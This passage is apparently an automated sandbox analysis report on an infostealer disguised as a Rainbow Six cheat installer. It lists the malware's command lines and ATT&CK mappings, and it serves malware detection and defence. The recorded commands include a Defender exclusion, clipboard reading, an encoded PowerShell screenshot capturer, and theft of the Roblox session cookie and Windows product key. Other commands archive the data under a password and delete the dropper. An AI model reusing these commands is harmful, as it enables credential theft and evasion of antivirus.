      attrib +h +s "C:\Users\Admin\Desktop\R6-cheats_promanners-main\Installer_patch.exe"
      4⤵
      Views/modifies file attributes
      PID:2704
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‏‎   .scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2244
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‏‎   .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:2928
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4756
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4504
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1292
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:3824
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    PID:460
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4916
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    PID:4028
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      PID:2872
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:2040
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:464
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2804
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3128
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:2132
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:2352
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    PID:5108
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:3236
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    PID:932
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:2400
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\f23jwblb\f23jwblb.cmdline"
        5⤵
        
        PID:4952
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES52B.tmp" "c:\Users\Admin\AppData\Local\Temp\f23jwblb\CSCBD2F4C53716E4CDA8D79C685C8CA884.TMP"
        6⤵
        
        PID:1204
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:704
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3424
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4992
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:2432
  - - C:\Windows\system32\attrib.exe
      attrib -r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:3576
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:4984
  - - C:\Windows\system32\attrib.exe
      attrib +r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:2348
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:348
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2476
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:3576
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3128
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:2828
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3712
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1900
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:456
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4388
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:700
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4028
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:1376
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:4312
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:1740
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:3732
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:2720
  - - C:\Windows\system32\getmac.exe
      getmac
      4⤵
      PID:1808
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI46642\rar.exe a -r -hp"blanco123" "C:\Users\Admin\AppData\Local\Temp\LLCIR.zip" *"
    3⤵
    PID:2536
  - - C:\Users\Admin\AppData\Local\Temp\_MEI46642\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI46642\rar.exe a -r -hp"blanco123" "C:\Users\Admin\AppData\Local\Temp\LLCIR.zip" *
      4⤵
      Executes dropped EXE
      PID:4992
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:1084
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3236
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:5112
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:2416
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:5100
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:5072
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4336
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    PID:1048
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:1204
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:2976
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious behavior: EnumeratesProcesses
      PID:3772
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:3024
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      PID:2528
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\Desktop\R6-cheats_promanners-main\Installer_patch.exe""
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:1808
  - - C:\Windows\system32\PING.EXE
      ping localhost -n 3
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:3576

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:456

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.4467_none_7e0f83e07c8c1985\TiWorker.exe
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.4467_none_7e0f83e07c8c1985\TiWorker.exe -Embedding
1⤵
- Drops file in Windows directory
PID:2872

C:\Users\Admin\Desktop\R6-cheats_promanners-main\Installer\Installer.exe
"C:\Users\Admin\Desktop\R6-cheats_promanners-main\Installer\Installer.exe"
1⤵
- Executes dropped EXE
PID:3692

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4356

C:\Users\Admin\Desktop\R6-cheats_promanners-main\Installer\Installer.exe
"C:\Users\Admin\Desktop\R6-cheats_promanners-main\Installer\Installer.exe"
1⤵
- Executes dropped EXE
PID:2396

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Process Discovery

T1057

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Clipboard Data

T1115

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
3eb3833f769dd890afc295b977eab4b4

SHA1
e857649b037939602c72ad003e5d3698695f436f

SHA256
c485a6e2fd17c342fca60060f47d6a5655a65a412e35e001bb5bf88d96e6e485

SHA512
c24bbc8f278478d43756807b8c584d4e3fb2289db468bc92986a489f74a8da386a667a758360a397e77e018e363be8912ac260072fa3e31117ad0599ac749e72

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
d6d1b8bb34838ccf42d5f69e919b1612

SHA1
20e9df1f5dd5908ce1b537d158961e0b1674949e

SHA256
8a4e7eae00df2e789c958a38e78ac0b53f439afe2d5bfe8a81fb8c6e232b6491

SHA512
ff3ba5dc3cb548018747a315f098e01c5a6f8aee029223ef4080b3db76b0ecaa6a01a1c79e1434bdf2aa5b2ae66ec85d33e760064282411c7712fba890a0309d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
83d94e8aa23c7ad2db6f972739506306

SHA1
bd6d73d0417971c0077f772352d2f538a6201024

SHA256
dfa5cbd243b304f47196c492bc2d8b29941a550c2f076ef8bdfca72755e71881

SHA512
4224625e8ef8dadc72f1e1a1edfe2079656b14f2af94ce6128316481d96e9d0b6edf4de13fcdcc182038a2b29eb562b9246f944aecebfcb7c5ee8d7936b6287e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
87a5fc67eae5ade8328f951c8116e514

SHA1
2072082ed352079d3369d52c00123cf81cbc68b1

SHA256
bacc77913b77c36bfc08f6c3df98903de5ce8ed7d0de82e918892c8151e27156

SHA512
a923609ce9a32cfc25a49714b739a247e8ebf728af18284f1414799f5dc3a4b6b604772f1fb0dbfc6bd9ef4e73a8d5d6c4aa4176bc7a8ffdc79bf75c08201b1f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
33287e49f6eaba2d1ef2051051f82854

SHA1
bebd7e3e83e10f3fad883a509ecc1e4f3c3d38a5

SHA256
77e1b16217bb47355474c6a65af74aa0d933e6842840c0cb1674818e21b27792

SHA512
c068f2c5051ba3c3b240ff4436c281754a9765adb2a80b0c6347a84ddfe0839ee937b736ea3979ba5724cfe17055fc501f0e3127e89052b883b889eb3318eb9c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
45bbc89231cace8ab8998030afdd1386

SHA1
06273aaa48184e39891c29ecb18e0dc86c5c796a

SHA256
626afa1f877f362c49e0ebdce27f8ede8338990ae4cd3ab2f7f0053ad8b5350e

SHA512
c7c543bf8e6eca8b289bf04995ccf71ba50211626b8f9937ce731140352a175cf61621c0526c0b344333c596d9b70934fa18d1749cc263148b991bcb36131953

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES52B.tmp

Filesize
1KB

MD5
f9e5d06991d3d84085d4977881dc71cb

SHA1
945f9887b07750fd6d5ec962d15f1a2a4735c1ca

SHA256
4ced18ad031223cf65b7da3fcbf70273c59321293a8233d1efabb21f4a7aa3bd

SHA512
4d9fb71795213376b49869883d7711e56a5b03a317b5fdc14d3aed41ffe166a3876381c484d3376d8f0ad426e3aecd0ef0ee956976b36aa92ce5148260dfeb66

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI46642\VCRUNTIME140.dll

Filesize
106KB

MD5
870fea4e961e2fbd00110d3783e529be

SHA1
a948e65c6f73d7da4ffde4e8533c098a00cc7311

SHA256
